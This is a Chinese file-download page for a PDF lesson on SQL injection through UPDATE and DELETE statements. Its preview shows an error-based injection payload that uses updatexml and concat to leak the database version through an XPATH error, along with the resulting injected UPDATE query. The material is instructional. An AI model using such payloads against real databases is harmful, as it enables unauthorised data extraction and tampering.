1. 首页
  2. 数据库
  3. 其它
  4. class10–updatedelete注入

class10–updatedelete注入

上传者: 2021-01-16 21:01:26上传 PDF文件 25KB 热度 10次
update注入 update users set username=‘tonynnnnn’,password=‘tonynnnn’,sex=‘man’ where id=‘3’ 注入payload:‘or updatexml(1,concat(0x7e,(version()),0x7e),0) or’ 带入就是 update users set username=‘tonynnnnn’,password=’‘or updatexml(1,concat(0x7e,(version()),0x7e),0) or’’,sex=‘man’ where id=‘3’ XPATH syntax erro
下载地址
用户评论